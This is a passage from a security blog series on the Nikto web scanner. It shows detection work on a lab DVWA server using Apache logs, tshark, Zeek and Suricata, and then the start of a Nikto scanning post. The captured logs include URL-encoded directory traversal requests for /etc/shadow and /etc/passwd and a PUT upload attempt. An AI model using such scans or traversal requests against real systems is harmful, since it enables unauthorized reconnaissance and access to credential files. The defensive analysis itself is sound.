</span></span></pre></div>
<p></p><p>At first glance, above seems interesting to me. I'm targeting Dam Vulnerable Web Application (DVWA) platform, so I was surprised to see all this guidance about Cisco, EMC, IBM, etc.</p><p>Let's see what we can find via our first step of network forensics.</p><p><b><span style="font-size: medium;">Detect - Log Analysis</span></b></p><p>Looking at the first five lines of the <i>access.log</i> file</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ head access.log --lines=5</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET %2f HTTP/1.1" 400 326 "-" "-"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /%63g%69%2e%63%67%69%2f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /%77%65bcg%69%2f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET %2f%63%67i%2d%39%314/ HTTP/1.1" 400 326 "-" "-"</span>
<span style="color: white;">...</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Immediately, we see entries such as "/%63g%69%2e%63%67%69%2f". This will need to be decoded. If we copy this into one of our decoding tools, we see this converts to "/cgi.cgi/". With this in mind, do we really wish to copy every entry inside of a tool and decode it?</p><p>Let's try to find an easy path to solve this problem. Let's cheat by installing <i>gridsite-clients</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ sudo apt-get install gridsite-clients</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With <i>gridsite-clients</i> installed, let's decode.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ urlencode -d "/%63g%69%2e%63%67%69%2f"</span>
<span style="color: white;">/cgi.cgi/</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Rather than going through all the entries, like we did above, let's just take a look at the HTTP status codes.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat access.log | awk --field-separator='1.1' '{ print $2 }' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">cut --fields 2 --delimiter ' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 738 400</span>
<span style="color: white;"> 677 404</span>
<span style="color: white;"> 22 302</span>
<span style="color: white;"> 22 </span>
<span style="color: white;"> 2 503</span>
<span style="color: white;"> 2 403</span>
<span style="color: white;"> 2 200</span>
<span style="color: white;"> 1 405</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With a summary of the status codes, we see <i>400</i> and <i>404</i> representing the largest amounts. <i>4xx</i> represents client side errors such as bad request (<i>400</i>) or resource not found (<i>404</i>). There is also<i> 405</i>. This represents the method was not allowed. <i>5xx</i> represent server side errors. Here see <i>503</i>. <i>503</i> is means the server cannot handle the request. We will focus on the 2 successful (<i>200</i>).</p><p>What is that <i>405</i> message about method not allowed?! Peeking ...</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat access.log | grep "405"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:21 -0400] "PUT /n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl HTTP/1.1" 405 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>So we see the attempt to use the put method. Let's decode what is was trying to put.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ urlencode -d "PUT /n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl"</span>
<span style="color: white;">PUT /nikto-test-sNajRVDd.html</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Interesting, so Nikto tried to put a file on the server. We assume this failed because we got the message method not allowed.</p><p>Looking at the two <i>200</i> messages.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\s+200\s+"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:22 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [31/May/2023:09:17:22 -0400] "TRACE / HTTP/1.1" 200 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above, the two successes were for <i>OPTIONS</i> method and <i>TRACE</i> methods. It seems there is no further need for us to dig deeper into this log.</p><p>Let's peek into the <i>error.log </i>file.</p><p>There's a lot in here, I'm going to extract only the items which are <i>core:error</i></p><p><i><!--HTML generated using hilite.me--></i></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat error.log | grep --perl-regexp '10.0.0.108' | grep "core:error" | grep --perl-regexp '\s+\(.*?\)' --only-matching | cut --fields 2 --delimiter "(" | cut --fields=1 --delimiter=')'</span>
<span style="color: white;">/%2e%2e/..%2f%2e%2e%2f.%2e%2f.%2e/../%2e.%2f%2e.%2f%2e.%2f../%2e.%2f%2e./%65t%63/%73ha%64o%77</span>
<span style="color: white;">/%64a%6ea%2d%6e%61%2f../d%61n%61%2f%68%74%6dl%35a%63%63%2fg%75%61%63a%6d%6fle/%2e%2e/%2e%2e/%2e./.%2e%2f%2e%2e%2f%2e%2e%2fe%74c/%70%61s%73w%64?/d%61na/ht%6dl%35acc/gua%63amo%6ce/</span><span style="font-family: Times New Roman;"><span style="white-space: normal;"><i>
</i></span></span></pre></div><i>
</i><p></p><p>As before, this has to be decoded. Let's build on that output, by leveraging <i>awk</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat error.log | grep --perl-regexp '10.0.0.108' | grep "core:error" | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp '\s+\(.*?\)' --only-matching | cut --fields 2 --delimiter "(" | cut --fields=1 --delimiter=')' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='$' '{ system("urlencode -d " $1) }'</span>
<span style="color: white;">/../../../../../../../../../../../../etc/shadow</span>
<span style="color: white;">/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Awesome, we were able to decode via a one-liner. Above shows <i>directory traversal attack</i> looking for <i>/etc/shadow</i> and <i>/etc/passwd</i>. We know these are false positives because the web server is running on Windows. Hence nothing for us to analyze here.</p><p>Transitioning to packet analysis.</p><p><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></p><div>Setup for packet analysis. Capture packets on ports 80 or 443</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ tshark -n -w tuning_2.pcap -f 'tcp port(80 or 443)' --interface eth0</span>
</pre></div>
</div><div><br /></div><div>We know from the log analysis, there were 2 <i>200</i> messages and 1 <i>405</i>. Let's start with the <i>405</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ tshark -n -r tuning_2.pcap -Y 'http.response.code == 405' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.stream -E header=y</span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.dstport tcp.stream</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 43566 11</span>
</pre></div>
</div><div><br /></div><div><div>Digging deeper into this stream. We see the full details of the request and the response.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span>└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:43566 | grep 405 --before-context=10 --after-context=7</span>
<span>332</span>
<span style="font-weight: bold;">PUT</span> <span>/n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Content-Type</span><span>:</span> <span>application/x-www-form-urlencoded</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">Content-Length</span><span>:</span> <span>22</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
This was a Nikto test.
608
HTTP/1.1 405 Method Not Allowed
Date: Wed, 31 May 2023 13:17:21 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Allow: POST,OPTIONS,HEAD,GET,TRACE
Content-Length: 321
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for this URL.</p>
<hr>
<address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Server at 10.0.0.106 Port 80</address>
</body></html></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Interestingly, though from above while the <i>PUT</i> method was not allowed, we see the server allows "<i>POST,OPTIONS,HEAD,GET,TRACE</i>". Moving on, nothing else to see with this method.</p><p>Looking at the two records where the response code is <i>200</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ tshark -n -r tuning_2.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.stream -E header=y</span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.dstport tcp.stream</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 46274 312</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 46314 315</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking at stream <i>312</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span>└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:46274 | grep 200 --before-context=8 --after-context=7</span>
<span>193</span>
<span style="font-weight: bold;">OPTIONS</span> <span>*</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
187
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 13:17:22 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Nothing exciting there. Nothing exciting for the <i>TRACE</i> either. </p><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span>└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:46314 | grep 200 --before-context=8 --after-context=7 </span>
<span style="font-weight: bold;">TRACE</span> <span>/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">Trace-Test</span><span>:</span> <span>Nikto</span>
446
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 13:17:22 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: message/http</span>
</pre></div>
</div><div><br /></div><p>Nothing much more to do here via packet analysis. There is a lot in the packets but in this scenario, what is the real benefit of looking at<i> 4xx </i>and <i>5xx</i> errors. If you have a different opinion on the 4xx codes, feel free to share your opinion in the chat.</p><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div><div><br /></div><div>Setup Zeek</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Let's see what can <i>Zeek</i> can tell us. Focusing primarily on the tasks which were successful:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp '\s+200\s+' | cut --fields 1 --delimiter='-' </span>
<span style="color: white;">1685539068.778266 CfTqVex3giFVuZHr1 10.0.0.108 46274 10.0.0.106 80 2 OPTIONS 10.0.0.106 *</span>
<span style="color: white;">1685539068.802076 CeV6D319VtYt5qKZHf 10.0.0.108 46314 10.0.0.106 80 1 TRACE 10.0.0.106 /</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Let's take the UID "CfTqVex3giFVuZHr1" to see where else there is associated activity. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ grep "CfTqVex3giFVuZHr1" *.log | cut --fields=1 --delimiter=':' | sort --unique </span>
<span style="color: white;">conn.log</span>
<span style="color: white;">files.log</span>
<span style="color: white;">http.log</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>So far, we've worked with the <i>http.log</i>, so there is no surprise that the <i>conn.log</i> file also shows up there. What's in the <i>files.log</i>. Let's go hunting there.</p><p>The <i>files.log</i> did not return anything meaningful.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2] </span>
<span style="color: white;">└─$ grep "CfTqVex3giFVuZHr1" files.log </span>
<span style="color: white;">1685539068.776983 F4eJjh2lgpWOQmofe CfTqVex3giFVuZHr1 10.0.0.108 46274 10.0.0.106 80 HTTP 0 (empty) text/html - 0.000000 - F 297 297 0 0 F - - - - - - -</span>
<span style="color: white;">1685539068.790150 Fx2Mtn4wvdujHy9u29 CfTqVex3giFVuZHr1 10.0.0.108 46274 10.0.0.106 80 HTTP 0 (empty) text/html - 0.000000 - F 326 326 0 0 F - - - - - - -</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Moving on to IDS analysis</p><p><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></p><p>Setup Suricata to operate in IDS mode</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Taking a look at the alerts triggered for this activity. We see there were 37 alerts triggered.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines </span>
<span style="color: white;">37</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Peeking into the top 5 alerts that triggered the most.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5</span>
<span style="color: white;"> 122 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 8 1:2101402:9] GPL EXPLOIT iissamples access </span>
<span style="color: white;"> 7 1:2100977:15] GPL EXPLOIT .cnf access </span>
<span style="color: white;"> 5 1:2101245:13] GPL EXPLOIT ISAPI .idq access </span>
<span style="color: white;"> 4 1:2101129:9] GPL WEB_SERVER .htaccess acces</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Nothing more to do here.<br /><br /></p><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div><p>References:</p><p><a href="https://www.urldecoder.net/linux-urldecode" target="_blank">https://www.urldecoder.net/linux-urldecode</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status" target="_blank">https://developer.mozilla.org/en-US/docs/Web/HTTP/Status</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PUT" target="_blank">https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PUT</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS" target="_blank">https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/TRACE" target="_blank">https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/TRACE</a></p>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-6003670157944125892023-12-12T18:17:00.000-08:002023-12-12T18:37:47.276-08:00Beginning Nikto - Scanning for interesting files seen in the logs<p>The idea of this series, is to use Nikto to learn about common vulnerabilities in web services. Once those vulnerabilities are identified, we will then attempt to exploit them where possible. As I work in a SOC, we have to be prepared to detect. As a result, we will analyze logs, packets (Tshark), IDS (Suricata) and Zeek data. This is all in the spirit of <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and detect</a>.</p><p>We will attempt to learn some of the different evasion techniques used by Nikto throughout this series, as we go through the 10 different "<i>Tuning" strategies</i>.</p><p>The web server I will be targeting is <a href="https://github.com/digininja/DVWA" target="_blank">Dam Vulnerable Web App (DVWA)</a>.</p><p>In this first post within this series, we will leverage Nikto to find "<i>interesting files</i>" on the web server. </p><p><br /><b><span style="font-size: medium;">Hack "Interesting File / Seen in logs"</span></b></p><p>Let's assume we did reconnaissance on the host and identified that port 80 is opened and offering web service. With that knowledge, lets' see if what we can learn about interesting files on the system.</p><p>First run Nikto without any type of evasions.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">-o /tmp/nikto.json -nossl -no404 -Tuning 1</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Start Time: 2023-05-11 16:08:10 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">+ /img/: Directory indexing found.</span>
<span style="color: white;">+ /img/: This might be interesting.</span>
<span style="color: white;">...</span>
<span style="color: white;">+ 2596 requests: 0 error(s) and 8 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-05-11 16:08:16 (GMT-4) (6 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span>
</pre></div>
